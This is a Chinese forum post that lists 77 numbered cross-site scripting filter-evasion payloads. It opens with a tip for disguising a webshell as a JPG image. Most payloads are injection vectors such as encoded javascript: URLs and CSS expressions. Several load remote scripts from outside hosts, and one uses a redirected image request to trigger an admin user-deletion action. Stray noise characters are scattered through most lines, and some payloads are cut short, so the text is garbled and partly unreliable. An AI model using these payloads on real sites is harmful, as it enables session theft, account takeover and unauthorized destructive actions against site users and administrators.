跨站图片shell1 g* l0 n+ N' I
XSS跨站代码 <script>alert("")</script>
8 b% {2 J; c( [# a* K0 g
7 `8 B1 m, [% c. h% u! Z* A3 _将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马0 ?7 V r9 Q' A8 a2 R4 R
; @+ Y: E6 Q9 @* e' ?
. ~: v$ A" R4 m, }' J B
2 _; n8 \" q8 s) w6 ?7 G
1)普通的XSS JavaScript注入
! ?: Q# a5 b( b<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" w$ g r, P3 q$ W. r4 k9 f/ k
9 V {% |7 v5 T3 }6 D. Y
(2)IMG标签XSS使用JavaScript命令 T3 _( \; A4 R* ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 J5 u+ O/ I; l; R
2 k9 S0 ]% n; Q) u! K" I' ?) J
(3)IMG标签无分号无引号% P6 k; `. N3 K% R$ X5 i
<IMG SRC=javascript:alert(‘XSS’)>
7 W" r1 k" b2 S j' q# @) _5 _) S# N* h5 E+ ~4 l5 }
(4)IMG标签大小写不敏感
S$ ~: z9 s- W# W' D<IMG SRC=JaVaScRiPt:alert(‘XSS’)>% M/ G: G `& w0 Y( O. h5 q
6 L, g- L6 K; Y+ ~# V J, G b% c
(5)HTML编码(必须有分号)
1 f2 }# P7 W8 G5 b# j6 C- N, d<IMG SRC=javascript:alert(“XSS”)>
# C: s7 w5 s F/ S3 s/ c$ o# D# _ b
(6)修正缺陷IMG标签, k; f2 C+ V Z2 C6 {4 D
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> K R7 m" ^2 E
& G4 o9 E9 p4 _2 t9 M% |4 Z3 b @0 ^(7)formCharCode标签(计算器)
) t9 C6 N' s4 F! s- W. `" l- z3 z<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 \4 `( G& |: Y9 ?. g
8 Q& T* K1 y D& C5 _
(8)UTF-8的Unicode编码(计算器)9 `6 a3 o2 d5 Z+ c, [
<IMG SRC=jav..省略..S')>: L$ ~6 }( w( o! N1 K) M. o1 }
. G, ]7 B) K @( n
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* S( e/ o+ R2 q9 a3 A<IMG SRC=jav..省略..S')>
" K% Y; N" _: E( W; F+ ~* b" l6 j5 R( T8 E: X2 L2 ` ~" M9 _
(10)十六进制编码也是没有分号(计算器)
3 p2 D' |' s' f! _# V<IMG SRC=java..省略..XSS')>
R" }& b9 G, }3 E9 v/ O2 t7 B3 N5 [* L3 V( [
(11)嵌入式标签,将Javascript分开% p% m/ s' t5 S& V. \5 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, r0 Q3 Z5 z* e4 l7 [
4 W7 j* ^: K6 B(12)嵌入式编码标签,将Javascript分开
1 u; I2 K+ O) k" l" U( A<IMG SRC=”jav ascript:alert(‘XSS’);”>
" `8 h: P2 i% n& G/ }5 W) A
! f6 u7 s i; e1 I4 q(13)嵌入式换行符' L* ~7 ]" C& u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 B, [1 p) b: u3 K, A
/ y/ R, H- O% X r(14)嵌入式回车! @, C4 g6 R @$ Y9 F
<IMG SRC=”jav ascript:alert(‘XSS’);”># B* F" `0 O3 i! C9 Q5 x+ y
: Y) d6 n( C% q( O3 B7 {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
. T5 I3 F1 Q( b# \% i3 f<IMG SRC=”javascript:alert(‘XSS‘)”>
2 ?1 a3 G5 K1 h" \8 X% ^1 h
( V% r0 `" f1 U( A! y(16)解决限制字符(要求同页面)
$ O" p7 c# B0 n7 b( {<script>z=’document.’</script>
+ B1 ?+ u1 s0 _3 b$ f7 L<script>z=z+’write(“‘</script>
& [3 K, f" r. q( m+ Q. Y) E<script>z=z+’<script’</script>$ w# L- _5 {" }- s! g2 f
<script>z=z+’ src=ht’</script>
& a0 V; g- z3 \8 g! k% @<script>z=z+’tp://ww’</script>4 b+ H, c. ~4 M) q. G
<script>z=z+’w.shell’</script>
& m: F* b5 N/ H2 r, b A<script>z=z+’.net/1.’</script>8 b E4 E3 Q- X2 \3 w; j9 d
<script>z=z+’js></sc’</script>6 @) L6 j, v+ M% V
<script>z=z+’ript>”)’</script>
+ ]9 @& M( C- A4 y+ S ]2 O* L4 |<script>eval_r(z)</script>" \& M" [: F+ |; `8 y6 J8 v
7 }6 E2 K* U8 `$ X, Z(17)空字符
! h, [# |" V! y$ Y% tperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out! }9 |1 M# V+ M) r I9 Z
9 A7 I# j$ j4 G4 |/ g1 i& f [
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 K3 b# @+ d0 Q+ c0 F& X2 Jperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
1 Y1 A: c$ S! U4 Y2 g4 L; z9 _- t% \; v$ p( k* E. Q
(19)Spaces和meta前的IMG标签2 i0 U1 ]+ N7 C, Y( i: k4 t
<IMG SRC=” javascript:alert(‘XSS’);”># V- \9 A8 d/ X" j) Q
) {& h1 N& o9 J; N$ Z7 J: ]
(20)Non-alpha-non-digit XSS) y! Z5 D6 F% H9 g3 H
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
0 S& B( `* ~. y# G0 P. ~# I, s+ l1 _5 s
(21)Non-alpha-non-digit XSS to 2
1 c, J1 G# B- @) s<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 A, s, m1 P) V3 n$ i+ a B
8 V$ E" Y4 d- \8 h W u(22)Non-alpha-non-digit XSS to 32 g# V7 V. r1 ~9 f4 l
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 W! S0 @- C: B+ r9 _
" J3 y8 Y0 g& e* {- e(23)双开括号
7 ^0 D* Y' A+ g: \8 V: [<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ |- j' E: m) u6 \" s
5 Q& H. w& q8 H5 d6 I(24)无结束脚本标记(仅火狐等浏览器)
3 l+ F! u6 p& }, M3 w* B/ O<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
8 {& H0 V; r0 y6 R" |& i0 l7 n- l3 c( }, m0 X4 D4 C
(25)无结束脚本标记2; i$ x1 ~, _# R2 \+ [8 R0 B8 H$ w/ ^
<SCRIPT SRC=//3w.org/XSS/xss.js>
5 }+ X' m2 T7 N1 W3 X
' j. F$ {+ F$ J! o(26)半开的HTML/JavaScript XSS/ q* m, o: d& {
<IMG SRC=”javascript:alert(‘XSS’)”
7 z1 a1 O7 L! N9 m5 r* [! M% J$ h2 F
(27)双开角括号
. P S: {. K0 z; a7 P<iframe src=http://3w.org/XSS.html <7 [; M3 I$ d: d9 H0 T
) ~2 ]4 `+ f0 X4 O7 j(28)无单引号 双引号 分号( A% e/ F+ Z' |9 I5 H: Y {2 x
<SCRIPT>a=/XSS/6 [4 d" ?0 |3 j# w6 x* ]
alert(a.source)</SCRIPT>
1 C. T3 @9 D1 Q% j! o$ s% }
5 a4 f+ e5 t2 p(29)换码过滤的JavaScript
+ g( @2 T# G5 f! H\”;alert(‘XSS’);//
. [/ G: S. u) w8 E
& d9 b! ?, N5 r" d' n# F. I9 P1 O8 k(30)结束Title标签
: e* B2 O1 J$ R/ q</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>) P F" U5 k3 I( o! t! y
( {0 ~7 m% G+ j7 }(31)Input Image
; x3 S( J. j% k2 l<INPUT SRC=”javascript:alert(‘XSS’);”>$ j# r8 L* |! S. e4 I9 L
/ O) }7 L! w# _( s& C
(32)BODY Image7 O$ Y% M4 u$ |4 O) D
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# g) I. Z! x, J" C: X8 B% i/ Z" O) u/ z1 O, P
(33)BODY标签1 c J# a V& O: p$ W: s' b
<BODY(‘XSS’)>
- e6 v4 K0 R V9 D5 Q6 @% `: m5 }
(34)IMG Dynsrc
2 V, Z' w% O1 z* j8 _4 G<IMG DYNSRC=”javascript:alert(‘XSS’)”>6 V: {+ C. N, e. e7 P e0 g" d
+ x2 i9 Y W. W( j* H" `7 z1 M
(35)IMG Lowsrc' b! s* A' t$ p/ Q+ m( H2 a; W
<IMG LOWSRC=”javascript:alert(‘XSS’)”>( o2 L1 u; _/ O; t$ j
5 w4 B- l5 j3 r6 i! O! n(36)BGSOUND7 T5 n' \4 R) x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
0 H: W3 o3 L0 ]: g/ a- i: K
: c b* W8 l7 [, Y O% ~(37)STYLE sheet
0 `* a) I! j2 e) N, u E( t# w& \<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>, u5 J9 E+ D3 D1 _- ^1 j5 @$ a
2 e/ U: _ a! K8 u! w4 D(38)远程样式表) X6 ^6 k( ~" m% C1 l* k, c/ e
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# d1 f& Q5 u- P* ~5 y: E/ E% I, r! B v% G
(39)List-style-image(列表式)
; x! Q( x/ p5 `8 @; z( j( y2 B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: I" D* ~3 `+ H+ K6 t1 J @6 f- m4 x9 M$ W8 P: U- ~) S1 s
(40)IMG VBscript% _* f1 P. r5 A' }
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. {4 G# ^, b% j3 N
0 R; t; Q# p1 G2 j
(41)META链接url6 \7 H* U ^& ]
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
! Q" _8 [: L q) g9 `; R3 l$ j0 c$ }
(42)Iframe: c- z1 h6 }# U5 K4 X- ^. e
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- ?& r# i3 w+ O l0 {(43)Frame
+ t" z, X# P: ~5 u" j1 R/ `<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>. x* R! N) d3 I# f* N; g
+ l5 W# s" ^ h6 L* ~, P N: n
(44)Table
2 c9 j- K0 c* p$ T( L2 |+ p$ i. Q<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 V" f& a+ ?5 Q6 m) P: R! a( O. q' Z# ~! b4 A$ J$ A, E1 A
(45)TD' f1 S' L: u/ q) Q2 C+ I* o3 |
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>* q7 h3 [6 b/ V5 s' K* o, }
1 z7 X, e) G1 X7 Z
(46)DIV background-image
3 R* N4 g2 F8 b' @0 y& d# ]/ V# s$ T& `' P<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
3 v' T9 V; h: m% L" m* X, s5 h8 W7 s$ T# s `
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
- G: N! Q) K1 a+ n7 W, D<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>/ Z3 Y' S2 C% y5 Q0 T
+ j& Q) X! v7 h
(48)DIV expression
, s3 N x( {6 g1 }6 a<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" @7 g% z5 k2 T1 _1 K; q! y
" _4 m& B: M' f" X) F(49)STYLE属性分拆表达# x. A K# w% E0 M7 q/ ^9 R9 L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ T6 E/ q" z1 k& `# }. c: ?% |# h( N( x- N- u4 l
(50)匿名STYLE(组成:开角号和一个字母开头)
2 y. O' e G. u( ]<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ s& _+ J0 @: u3 F
8 J$ ?3 J6 e3 {( K4 ^# i(51)STYLE background-image( E$ P8 n+ t( a( ?
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" U+ w. f6 Y0 k5 n# Q% j: u5 Q$ ~5 d
(52)IMG STYLE方式0 S, @* P4 f+ H2 C! \
exppression(alert(“XSS”))’>0 J7 R6 m e% [
, i1 Y9 |2 l' Y9 Q; N( N* a
(53)STYLE background
4 S7 {" j! w1 N# [& \' X" \<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>" a, |$ i. t6 ?8 i- I
7 a3 K1 E6 V; f8 w( N! a$ }1 T8 E(54)BASE
- h: R: p* T. ~<BASE HREF=”javascript:alert(‘XSS’);//”>1 e/ H; |' V/ Q* n1 o
* o/ m2 \5 O$ c( }, O2 F* V
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 C& G# G3 p) ]. }+ ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
W+ W# ^8 L8 k0 C9 }& L3 Q3 X" u
(56)在flash中使用ActionScrpt可以混进你XSS的代码
, }9 o8 s' n/ R1 L9 M& aa=”get”;3 P; T' l0 l/ O/ |' r7 r: O
b=”URL(\”";
1 k& {; l7 I6 } E" Ec=”javascript:”;
0 B+ F5 Q T6 l$ o. ?3 Pd=”alert(‘XSS’);\”)”;1 N( ?% n2 U; G5 x# v3 m! T* M, U
eval_r(a+b+c+d);
9 n. S" I0 G! u$ I0 |
7 l# [3 I$ [3 c(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上( H# ?4 j" [1 R& g: E
<HTML xmlns:xss>
4 V( `3 q) ~/ l<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 f3 ~3 [# D& ]9 p# p# x. R<xss:xss>XSS</xss:xss>
9 Y/ C' s' l8 W4 I* k- b# B; T' e1 J</HTML># h" H; J/ D+ h: K
; v5 T; p- c. ]# L% [! g9 t
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ b' a( _$ T2 {1 a& o. q) I7 [
<SCRIPT SRC=””></SCRIPT>+ l: q7 Z2 Y- {0 T3 L
; { \! }3 O H6 j0 Q r8 f(59)IMG嵌入式命令,可执行任意命令' D! L2 o$ J7 o
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
; M9 V& I. @, ~9 j3 R' ?, `
5 a. X, P) J, M8 W9 {(60)IMG嵌入式命令(a.jpg在同服务器) B9 b( o: |/ f
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 ?" K: s2 T' l3 H4 V" m) m; ~
6 }& O1 I" L& w. c8 H5 x2 D(61)绕符号过滤6 {0 S) t- _. g* {$ }+ V. O* G
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>- D% ~8 c5 b) v0 K {3 r- N
) ]' y% s4 ^" b
(62)+ g! l' l( T- b2 m& D, f
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>" E( I' N7 ]. v+ G3 j
9 q( A& f7 w3 [" M: N% z. x: @/ K i(63)
& Q7 x6 |, f# {& K<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
6 E8 h& U6 P2 W( \1 g. r
* i: v7 u( o1 m6 ~8 F8 e(64)
2 f# w2 {, |+ z# f& m! H3 P<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>( W2 f. M, g# H* p# u+ I, H
6 J3 s2 G4 x* G/ @4 K S% S
(65)2 A, D- {' l& N C, E. d# \5 W
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
R; @/ w! y, V+ Q
+ C' |% U- h5 F! y* R, j(66)
: w$ u0 C: m" Q }0 E9 m/ Q" G0 [<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>) ]$ N! s$ z T+ U7 r* l
3 R" y. M9 W$ U! E8 Q/ q5 i(67)7 j6 S) d$ r) c
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
* @# T! k |2 D/ b! X/ b2 z- H6 a ]/ \. |; X* y; R# {
(68)URL绕行
5 `: I7 `- t$ F) u9 \' R( E<A HREF=”http://127.0.0.1/”>XSS</A>
1 p+ o) k {$ b- g9 A
5 G, F! z* {/ R/ K' o( O5 R(69)URL编码; v: d' I$ j {2 @3 h
<A HREF=”http://3w.org”>XSS</A>2 u: c. R1 z6 R4 z
2 I$ b) ]0 |5 T7 I# i
(70)IP十进制# t; @7 g o( t7 k/ ?
<A HREF=”http://3232235521″>XSS</A>" K: l% v0 G3 }
/ P/ \" m8 z) R; A/ T9 X, c(71)IP十六进制
5 _# ^7 t- T5 M% I0 Z. Q<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 a1 G- n, C. r5 E: s* Q# Z/ ?$ x5 c7 p2 q1 b
(72)IP八进制0 I& q2 g. { S7 e
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
& w" C$ V, l) \' Y/ q2 h, l
|4 w- L; ]1 E; j; U. \) E(73)混合编码+ I2 [, B0 {% j/ I
<A HREF=”h% h3 C- z! c! m5 y x2 b4 s
tt p://6 6.000146.0×7.147/”">XSS</A>% O a# m* B1 u. a
# ?) T5 P2 b. W/ Z) c7 L(74)节省[http:]
: z7 M: W0 S1 j/ o3 e<A HREF=”//www.google.com/”>XSS</A>
% ]8 i( i7 Q$ M% e2 A# D+ f. l( o
8 c1 Q4 X- c$ j' ?/ h# S(75)节省[www]9 m% @6 G+ K) @
<A HREF=”http://google.com/”>XSS</A>
1 Y% _! e; h8 ]3 { ~+ D9 e% s- n" ]3 b& Y6 w; _3 z! ]
(76)绝对点绝对DNS
3 ] K3 @% b2 ^: S' X1 X<A HREF=”http://www.google.com./”>XSS</A>: n/ u8 g! z0 Z2 w( }9 o& k; h/ o
* S+ s7 j$ v* C6 B(77)javascript链接% ?# X# j4 w9 ^4 w2 N9 C, p: x
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
: h: S; G* s* w# b* W |
发表于 2012-9-13 17:04:56
收藏
支持
反对